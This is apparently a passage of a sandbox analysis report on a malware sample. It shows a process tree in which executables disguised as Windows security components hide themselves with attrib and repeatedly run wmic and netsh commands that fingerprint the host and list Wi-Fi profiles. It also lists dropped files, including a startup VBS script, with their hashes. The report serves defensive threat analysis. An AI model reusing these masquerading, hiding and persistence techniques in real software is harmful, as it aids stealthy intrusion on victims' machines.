                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                  wmic os get Caption
                                                                                                  3⤵
                                                                                                    PID:5080
                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                    wmic cpu get Name
                                                                                                    3⤵
                                                                                                      PID:3296
                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                      wmic path win32_VideoController get name
                                                                                                      3⤵
                                                                                                      • Detects videocard installed
                                                                                                      PID:1676
                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                      netsh wlan show profiles
                                                                                                      3⤵
                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                      • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                      PID:3640
                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                      wmic csproduct get UUID
                                                                                                      3⤵
                                                                                                        PID:3184
                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                        wmic os get Caption
                                                                                                        3⤵
                                                                                                          PID:2816
                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                          wmic cpu get Name
                                                                                                          3⤵
                                                                                                            PID:4680
                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                            wmic path win32_VideoController get name
                                                                                                            3⤵
                                                                                                            • Detects videocard installed
                                                                                                            PID:2444
                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                            netsh wlan show profiles
                                                                                                            3⤵
                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                            • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                            PID:1604
                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                            wmic csproduct get UUID
                                                                                                            3⤵
                                                                                                              PID:1788
                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                              wmic os get Caption
                                                                                                              3⤵
                                                                                                                PID:4792
                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                wmic cpu get Name
                                                                                                                3⤵
                                                                                                                  PID:1180
                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                  wmic path win32_VideoController get name
                                                                                                                  3⤵
                                                                                                                  • Detects videocard installed
                                                                                                                  PID:3840
                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                  netsh wlan show profiles
                                                                                                                  3⤵
                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                  • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                  PID:4980
                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                  wmic csproduct get UUID
                                                                                                                  3⤵
                                                                                                                    PID:3516
                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                    wmic os get Caption
                                                                                                                    3⤵
                                                                                                                      PID:4684
                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                      wmic cpu get Name
                                                                                                                      3⤵
                                                                                                                        PID:4328
                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                        wmic path win32_VideoController get name
                                                                                                                        3⤵
                                                                                                                        • Detects videocard installed
                                                                                                                        PID:648
                                                                                                                      • C:\Windows\system32\netsh.exe
                                                                                                                        netsh wlan show profiles
                                                                                                                        3⤵
                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                        • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                        PID:4780
                                                                                                                    • C:\ProgramData\Microsoft\SecurityHealthSystray.exe
                                                                                                                      C:\ProgramData\Microsoft\SecurityHealthSystray.exe
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:5016
                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                        attrib +h +s C:\ProgramData\Microsoft\SecurityHealthSystray.exe
                                                                                                                        3⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:2440
                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                        wmic csproduct get UUID
                                                                                                                        3⤵
                                                                                                                          PID:2076
                                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                          wmic os get Caption
                                                                                                                          3⤵
                                                                                                                            PID:3788
                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                            wmic cpu get Name
                                                                                                                            3⤵
                                                                                                                              PID:608
                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                              wmic path win32_VideoController get name
                                                                                                                              3⤵
                                                                                                                              • Detects videocard installed
                                                                                                                              PID:3700
                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                              netsh wlan show profiles
                                                                                                                              3⤵
                                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                                              • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                              PID:1572
                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                              wmic csproduct get UUID
                                                                                                                              3⤵
                                                                                                                                PID:1864
                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                wmic os get Caption
                                                                                                                                3⤵
                                                                                                                                  PID:4464
                                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                  wmic cpu get Name
                                                                                                                                  3⤵
                                                                                                                                    PID:1984
                                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                    wmic path win32_VideoController get name
                                                                                                                                    3⤵
                                                                                                                                    • Detects videocard installed
                                                                                                                                    PID:1468
                                                                                                                                  • C:\Windows\system32\netsh.exe
                                                                                                                                    netsh wlan show profiles
                                                                                                                                    3⤵
                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                    • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                    PID:1560
                                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                    wmic csproduct get UUID
                                                                                                                                    3⤵
                                                                                                                                      PID:3684
                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                      wmic os get Caption
                                                                                                                                      3⤵
                                                                                                                                        PID:4784
                                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                        wmic cpu get Name
                                                                                                                                        3⤵
                                                                                                                                          PID:4124
                                                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                          wmic path win32_VideoController get name
                                                                                                                                          3⤵
                                                                                                                                          • Detects videocard installed
                                                                                                                                          PID:4932
                                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                                          netsh wlan show profiles
                                                                                                                                          3⤵
                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                          PID:5096
                                                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                          wmic csproduct get UUID
                                                                                                                                          3⤵
                                                                                                                                            PID:1676
                                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                            wmic os get Caption
                                                                                                                                            3⤵
                                                                                                                                              PID:436
                                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                              wmic cpu get Name
                                                                                                                                              3⤵
                                                                                                                                                PID:3732
                                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                wmic path win32_VideoController get name
                                                                                                                                                3⤵
                                                                                                                                                • Detects videocard installed
                                                                                                                                                PID:464
                                                                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                                                                netsh wlan show profiles
                                                                                                                                                3⤵
                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                                PID:2104
                                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                wmic csproduct get UUID
                                                                                                                                                3⤵
                                                                                                                                                  PID:3972
                                                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                  wmic os get Caption
                                                                                                                                                  3⤵
                                                                                                                                                    PID:3916
                                                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                    wmic cpu get Name
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4588
                                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                      wmic path win32_VideoController get name
                                                                                                                                                      3⤵
                                                                                                                                                      • Detects videocard installed
                                                                                                                                                      PID:3936
                                                                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                                                                      netsh wlan show profiles
                                                                                                                                                      3⤵
                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                      • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                                      PID:4628
                                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                      wmic csproduct get UUID
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2104
                                                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                        wmic os get Caption
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4256
                                                                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                          wmic cpu get Name
                                                                                                                                                          3⤵
                                                                                                                                                            PID:4624
                                                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                            wmic path win32_VideoController get name
                                                                                                                                                            3⤵
                                                                                                                                                            • Detects videocard installed
                                                                                                                                                            PID:4416
                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                            netsh wlan show profiles
                                                                                                                                                            3⤵
                                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                            • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                                            PID:4384
                                                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                            wmic csproduct get UUID
                                                                                                                                                            3⤵
                                                                                                                                                              PID:332
                                                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                              wmic os get Caption
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4948
                                                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                wmic cpu get Name
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:1572
                                                                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                  wmic path win32_VideoController get name
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Detects videocard installed
                                                                                                                                                                  PID:4628
                                                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                                                  netsh wlan show profiles
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                  • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                                                  PID:1120
                                                                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                  wmic csproduct get UUID
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:3888
                                                                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                    wmic os get Caption
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:2740
                                                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                      wmic cpu get Name
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2904
                                                                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                        wmic path win32_VideoController get name
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Detects videocard installed
                                                                                                                                                                        PID:4480
                                                                                                                                                                      • C:\Windows\system32\netsh.exe
                                                                                                                                                                        netsh wlan show profiles
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                        • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                                                        PID:4460
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\SecurityHealthWatcher.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Microsoft\Windows\SecurityHealthWatcher.exe
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                      PID:2436
                                                                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                                                                        attrib +h +s C:\Users\Admin\AppData\Local\Microsoft\Windows\SecurityHealthWatcher.exe
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                        PID:4100
                                                                                                                                                                    • C:\ProgramData\Microsoft\SecurityHealthWatcher.exe
                                                                                                                                                                      C:\ProgramData\Microsoft\SecurityHealthWatcher.exe
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                      PID:1236
                                                                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                                                                        attrib +h +s C:\ProgramData\Microsoft\SecurityHealthWatcher.exe
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                        PID:4656
                                                                                                                                                                    • C:\Users\Admin\Microsoft\SecurityHealthWatcher.exe
                                                                                                                                                                      C:\Users\Admin\Microsoft\SecurityHealthWatcher.exe
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                      PID:940
                                                                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                                                                        attrib +h +s C:\Users\Admin\Microsoft\SecurityHealthWatcher.exe
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                        PID:3992
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\SecurityHealthWatcher.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\SecurityHealthWatcher.exe
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:384

                                                                                                                                                                  Network

                                                                                                                                                                        MITRE ATT&CK Enterprise v16

                                                                                                                                                                        Replay Monitor

                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                        Downloads

                                                                                                                                                                        SecurityHealthSystray.exe

                                                                                                                                                                        • Path C:\ProgramData\Microsoft\SecurityHealthSystray.exe
                                                                                                                                                                        • Size 15.3MB
                                                                                                                                                                        • SHA256 02994a804f39c8f5d73cdec837ae731f7e6c0dd7f9a6a73be0c1ec057d81aaee
                                                                                                                                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                                                                                        powershell.exe.log

                                                                                                                                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                                                        • Size 2KB
                                                                                                                                                                        • SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
                                                                                                                                                                        • MD5 SHA1 SHA512 TLSH

                                                                                                                                                                        StartupProfileData-NonInteractive

                                                                                                                                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                        • Size 944B
                                                                                                                                                                        • SHA256 84bb5fcde33167c5342fb4bf02c25ce315c016a2118c51d24082254695163a71
                                                                                                                                                                        • MD5 SHA1 SHA512 TLSH

                                                                                                                                                                        StartupProfileData-NonInteractive

                                                                                                                                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                        • Size 944B
                                                                                                                                                                        • SHA256 c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb
                                                                                                                                                                        • MD5 SHA1 SHA512 TLSH

                                                                                                                                                                        5e0odphh.dll

                                                                                                                                                                        • Path C:\Users\Admin\AppData\Local\Temp\5e0odphh\5e0odphh.dll
                                                                                                                                                                        • Size 4KB
                                                                                                                                                                        • SHA256 583c1eb88c76b220b7d881cd3ca88f9b70ed8f8ed1babf0e59db86c145bee71e
                                                                                                                                                                        • MD5 SHA1 SHA512 TLSH

                                                                                                                                                                        Display (1).png

                                                                                                                                                                        • Path C:\Users\Admin\AppData\Local\Temp\E9v8kuQ9ns\Display (1).png
                                                                                                                                                                        • Size 604KB
                                                                                                                                                                        • SHA256 ef2d431db0f08bebf867a88d4120cd75550b183feb0ee7ddf09e9ee6fd9f3a8f
                                                                                                                                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                                                                                        RES209E.tmp

                                                                                                                                                                        • Path C:\Users\Admin\AppData\Local\Temp\RES209E.tmp
                                                                                                                                                                        • Size 1KB
                                                                                                                                                                        • SHA256 0935c1325e183aca73f2390b09a4fe288a8adb730c9187e195cb92eeda7dd7f3
                                                                                                                                                                        • MD5 SHA1 SHA512 TLSH

                                                                                                                                                                        __PSScriptPolicyTest_tlj4vjdr.b1w.ps1

                                                                                                                                                                        • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tlj4vjdr.b1w.ps1
                                                                                                                                                                        • Size 60B
                                                                                                                                                                        • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                                                                                                                                                        • MD5 SHA1 SHA512 TLSH

                                                                                                                                                                        RealtekAudioUpdate.vbs

                                                                                                                                                                        • Path C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RealtekAudioUpdate.vbs
                                                                                                                                                                        • Size 2KB
                                                                                                                                                                        • SHA256 e0377703114809d636d1f365eeb1b14e032eaa934d20b28e41440876a64a5386
                                                                                                                                                                        • MD5 SHA1 SHA512 TLSH

                                                                                                                                                                        hosts

                                                                                                                                                                        • Path C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                        • Size 2KB
                                                                                                                                                                        • SHA256 ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075
                                                                                                                                                                        • MD5 SHA1 SHA512 TLSH

                                                                                                                                                                        5e0odphh.0.cs

                                                                                                                                                                        • Path \??\c:\Users\Admin\AppData\Local\Temp\5e0odphh\5e0odphh.0.cs
                                                                                                                                                                        • Size 1004B
                                                                                                                                                                        • SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
                                                                                                                                                                        • MD5 SHA1 SHA512 TLSH

                                                                                                                                                                        5e0odphh.cmdline

                                                                                                                                                                        • Path \??\c:\Users\Admin\AppData\Local\Temp\5e0odphh\5e0odphh.cmdline
                                                                                                                                                                        • Size 607B
                                                                                                                                                                        • SHA256 4ac29019cc40283f41edff40a0e12024109a68d36025fb43cbca4ff9d6d823ab
                                                                                                                                                                        • MD5 SHA1 SHA512 TLSH

                                                                                                                                                                        CSC6E70738DF081466195C62FF3BD482A.TMP

                                                                                                                                                                        • Path \??\c:\Users\Admin\AppData\Local\Temp\5e0odphh\CSC6E70738DF081466195C62FF3BD482A.TMP
                                                                                                                                                                        • Size 652B
                                                                                                                                                                        • SHA256 08570380440897023b12f143918afa5bcc52ed6ddef792165a00c0daad5da365
                                                                                                                                                                        • MD5 SHA1 SHA512 TLSH

                                                                                                                                                                        memory/1604-56-0x00000222AE5B0000-0x00000222AE5D2000-memory.dmp

                                                                                                                                                                        memory/4356-93-0x00000230F2130000-0x00000230F2138000-memory.dmp